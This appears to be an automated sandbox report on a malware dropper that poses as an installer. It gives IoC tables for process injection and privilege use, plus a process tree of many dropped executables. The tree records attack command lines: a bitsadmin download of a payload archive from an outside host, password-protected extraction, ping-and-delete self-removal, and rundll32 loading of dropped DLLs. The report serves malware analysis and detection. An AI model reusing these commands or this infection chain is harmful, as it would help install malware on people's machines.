2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3024	Process not Found

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
5356	toolspab1.exe
5988	c7ae36fa.exe
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3708	explorer.exe
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
5780	explorer.exe
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
5600	explorer.exe
3024	Process not Found
3024	Process not Found
6036	edcggfb
5828	bfcggfb
3708	explorer.exe
3708	explorer.exe
5780	explorer.exe
5780	explorer.exe
5600	explorer.exe
5600	explorer.exe
4456	MicrosoftEdgeCP.exe
4456	MicrosoftEdgeCP.exe
1716	bfcggfb
4736	edcggfb

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3268	Ultra.exe
Token: SeDebugPrivilege	3476	Sefejilusi.exe
Token: SeDebugPrivilege	2180	Cokyxojyvi.exe
Token: SeDebugPrivilege	4016	MicrosoftEdge.exe
Token: SeDebugPrivilege	4016	MicrosoftEdge.exe
Token: SeDebugPrivilege	4016	MicrosoftEdge.exe
Token: SeDebugPrivilege	4016	MicrosoftEdge.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeTcbPrivilege	1032	svchost.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeAuditPrivilege	2424	svchost.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeDebugPrivilege	4308	rundll32.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAuditPrivilege	2424	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAuditPrivilege	2424	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
4020	ultramediaburner.tmp
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4016	MicrosoftEdge.exe
4456	MicrosoftEdgeCP.exe
4124	google-game.exe
4124	google-game.exe
4456	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3024	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 796 wrote to memory of 3732	796	Install.exe	75
PID 796 wrote to memory of 3732	796	Install.exe	75
PID 796 wrote to memory of 3732	796	Install.exe	75
PID 3732 wrote to memory of 3268	3732	Install.tmp	76
PID 3732 wrote to memory of 3268	3732	Install.tmp	76
PID 3268 wrote to memory of 1180	3268	Ultra.exe	80
PID 3268 wrote to memory of 1180	3268	Ultra.exe	80
PID 3268 wrote to memory of 1180	3268	Ultra.exe	80
PID 1180 wrote to memory of 4020	1180	ultramediaburner.exe	81
PID 1180 wrote to memory of 4020	1180	ultramediaburner.exe	81
PID 1180 wrote to memory of 4020	1180	ultramediaburner.exe	81
PID 3268 wrote to memory of 3476	3268	Ultra.exe	82
PID 3268 wrote to memory of 3476	3268	Ultra.exe	82
PID 4020 wrote to memory of 2308	4020	ultramediaburner.tmp	83
PID 4020 wrote to memory of 2308	4020	ultramediaburner.tmp	83
PID 3268 wrote to memory of 2180	3268	Ultra.exe	84
PID 3268 wrote to memory of 2180	3268	Ultra.exe	84
PID 2180 wrote to memory of 4428	2180	Cokyxojyvi.exe	88
PID 2180 wrote to memory of 4428	2180	Cokyxojyvi.exe	88
PID 4428 wrote to memory of 4564	4428	cmd.exe	90
PID 4428 wrote to memory of 4564	4428	cmd.exe	90
PID 4428 wrote to memory of 4564	4428	cmd.exe	90
PID 2180 wrote to memory of 508	2180	Cokyxojyvi.exe	141
PID 2180 wrote to memory of 508	2180	Cokyxojyvi.exe	141
PID 508 wrote to memory of 4124	508	cmd.exe	96
PID 508 wrote to memory of 4124	508	cmd.exe	96
PID 508 wrote to memory of 4124	508	cmd.exe	96
PID 4124 wrote to memory of 4308	4124	google-game.exe	97
PID 4124 wrote to memory of 4308	4124	google-game.exe	97
PID 4124 wrote to memory of 4308	4124	google-game.exe	97
PID 4308 wrote to memory of 1032	4308	rundll32.exe	68
PID 4308 wrote to memory of 2768	4308	rundll32.exe	19
PID 1032 wrote to memory of 4492	1032	svchost.exe	98
PID 1032 wrote to memory of 4492	1032	svchost.exe	98
PID 1032 wrote to memory of 4492	1032	svchost.exe	98
PID 4308 wrote to memory of 1004	4308	rundll32.exe	56
PID 4308 wrote to memory of 2460	4308	rundll32.exe	25
PID 4308 wrote to memory of 2424	4308	rundll32.exe	27
PID 4308 wrote to memory of 1096	4308	rundll32.exe	51
PID 4308 wrote to memory of 932	4308	rundll32.exe	53
PID 4308 wrote to memory of 1296	4308	rundll32.exe	46
PID 4308 wrote to memory of 1764	4308	rundll32.exe	36
PID 4308 wrote to memory of 1136	4308	rundll32.exe	49
PID 4308 wrote to memory of 1344	4308	rundll32.exe	45
PID 2180 wrote to memory of 4108	2180	Cokyxojyvi.exe	99
PID 2180 wrote to memory of 4108	2180	Cokyxojyvi.exe	99
PID 4308 wrote to memory of 2660	4308	rundll32.exe	22
PID 4308 wrote to memory of 2688	4308	rundll32.exe	20
PID 4108 wrote to memory of 4724	4108	cmd.exe	102
PID 4108 wrote to memory of 4724	4108	cmd.exe	102
PID 4108 wrote to memory of 4724	4108	cmd.exe	102
PID 2180 wrote to memory of 4364	2180	Cokyxojyvi.exe	103
PID 2180 wrote to memory of 4364	2180	Cokyxojyvi.exe	103
PID 4364 wrote to memory of 4996	4364	cmd.exe	105
PID 4364 wrote to memory of 4996	4364	cmd.exe	105
PID 4364 wrote to memory of 4996	4364	cmd.exe	105
PID 4456 wrote to memory of 4936	4456	MicrosoftEdgeCP.exe	93
PID 4456 wrote to memory of 4936	4456	MicrosoftEdgeCP.exe	93
PID 4456 wrote to memory of 4936	4456	MicrosoftEdgeCP.exe	93
PID 2180 wrote to memory of 5012	2180	Cokyxojyvi.exe	106
PID 2180 wrote to memory of 5012	2180	Cokyxojyvi.exe	106
PID 5012 wrote to memory of 1960	5012	cmd.exe	108
PID 5012 wrote to memory of 1960	5012	cmd.exe	108
PID 5012 wrote to memory of 1960	5012	cmd.exe	108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:932
- C:\Users\Admin\AppData\Roaming\bfcggfb
  C:\Users\Admin\AppData\Roaming\bfcggfb
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5932
- - C:\Users\Admin\AppData\Roaming\bfcggfb
    C:\Users\Admin\AppData\Roaming\bfcggfb
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5828
- C:\Users\Admin\AppData\Roaming\edcggfb
  C:\Users\Admin\AppData\Roaming\edcggfb
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6036
- C:\Users\Admin\AppData\Roaming\bfcggfb
  C:\Users\Admin\AppData\Roaming\bfcggfb
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4720
- - C:\Users\Admin\AppData\Roaming\bfcggfb
    C:\Users\Admin\AppData\Roaming\bfcggfb
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:1716
- C:\Users\Admin\AppData\Roaming\edcggfb
  C:\Users\Admin\AppData\Roaming\edcggfb
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4736
- C:\Users\Admin\AppData\Roaming\bfcggfb
  C:\Users\Admin\AppData\Roaming\bfcggfb
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:960
- - C:\Users\Admin\AppData\Roaming\bfcggfb
    C:\Users\Admin\AppData\Roaming\bfcggfb
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:5376
- C:\Users\Admin\AppData\Roaming\edcggfb
  C:\Users\Admin\AppData\Roaming\edcggfb
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:4840
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll",DlRhNcvOzN
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:796
- C:\Users\Admin\AppData\Local\Temp\is-U32IO.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-U32IO.tmp\Install.tmp" /SL5="$300F4,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Users\Admin\AppData\Local\Temp\is-DTDN0.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-DTDN0.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Program Files\Windows Security\UGIGLWABTJ\ultramediaburner.exe
      "C:\Program Files\Windows Security\UGIGLWABTJ\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1180
    - - C:\Users\Admin\AppData\Local\Temp\is-IF4I0.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IF4I0.tmp\ultramediaburner.tmp" /SL5="$6002E,281924,62464,C:\Program Files\Windows Security\UGIGLWABTJ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4020
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:2308
  - - C:\Users\Admin\AppData\Local\Temp\72-fa877-e1f-e50a9-66154f977df77\Sefejilusi.exe
      "C:\Users\Admin\AppData\Local\Temp\72-fa877-e1f-e50a9-66154f977df77\Sefejilusi.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:3476
  - - C:\Users\Admin\AppData\Local\Temp\23-17acd-851-4de89-37c6ffacc5b38\Cokyxojyvi.exe
      "C:\Users\Admin\AppData\Local\Temp\23-17acd-851-4de89-37c6ffacc5b38\Cokyxojyvi.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2180
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rmhabh0r.m2f\instEU.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4428
      - C:\Users\Admin\AppData\Local\Temp\rmhabh0r.m2f\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\rmhabh0r.m2f\instEU.exe
        6⤵
        Executes dropped EXE
        
        PID:4564
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3v00cebz.2mn\google-game.exe & exit
        5⤵
        
        PID:508
      - C:\Users\Admin\AppData\Local\Temp\3v00cebz.2mn\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\3v00cebz.2mn\google-game.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4124
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        7⤵
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4308
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wuapkp4.hcg\md1_1eaf.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4108
      - C:\Users\Admin\AppData\Local\Temp\2wuapkp4.hcg\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wuapkp4.hcg\md1_1eaf.exe
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:4724
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miod4iuj.usz\y1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4364
      - C:\Users\Admin\AppData\Local\Temp\miod4iuj.usz\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\miod4iuj.usz\y1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\QiF2PkK66p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\QiF2PkK66p.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:5268
        
        C:\Users\Admin\AppData\Roaming\1619343313798.exe
        
        "C:\Users\Admin\AppData\Roaming\1619343313798.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619343313798.txt"
        8⤵
        Executes dropped EXE
        
        PID:5548
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\QiF2PkK66p.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:508
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:5312
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\miod4iuj.usz\y1.exe"
        7⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:5124
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dyp0uepa.e11\askinstall39.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5012
      - C:\Users\Admin\AppData\Local\Temp\dyp0uepa.e11\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\dyp0uepa.e11\askinstall39.exe
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:1960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5380
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kv1up5gt.s2y\inst.exe & exit
        5⤵
        
        PID:4472
      - C:\Users\Admin\AppData\Local\Temp\kv1up5gt.s2y\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\kv1up5gt.s2y\inst.exe
        6⤵
        Executes dropped EXE
        
        PID:3732
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4zjszpj0.uhh\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:4064
      - C:\Users\Admin\AppData\Local\Temp\4zjszpj0.uhh\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\4zjszpj0.uhh\SunLabsPlayer.exe /S
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:4268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:5692
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:5804
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPPviIyAEhz2BJi1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5992
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pP4sJ2Xts2O9yQyZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
        7⤵
        Loads dropped DLL
        
        PID:5088
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:4144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:5312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl2E75.tmp\tempfile.ps1"
        7⤵
        
        PID:5572
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4356
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylyxoiwh.ltr\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:5128
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wu55pd2.wrn\toolspab1.exe & exit
        5⤵
        
        PID:5460
      - C:\Users\Admin\AppData\Local\Temp\2wu55pd2.wrn\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wu55pd2.wrn\toolspab1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\2wu55pd2.wrn\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wu55pd2.wrn\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5356
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ihzju2mr.ark\c7ae36fa.exe & exit
        5⤵
        
        PID:5688
      - C:\Users\Admin\AppData\Local\Temp\ihzju2mr.ark\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\ihzju2mr.ark\c7ae36fa.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5988
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kv1fugs.jip\app.exe /8-2222 & exit
        5⤵
        
        PID:5820
      - C:\Users\Admin\AppData\Local\Temp\5kv1fugs.jip\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\5kv1fugs.jip\app.exe /8-2222
        6⤵
        Executes dropped EXE
        
        PID:6128
        
        C:\Users\Admin\AppData\Local\Temp\5kv1fugs.jip\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5kv1fugs.jip\app.exe" /8-2222
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1876

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:4492

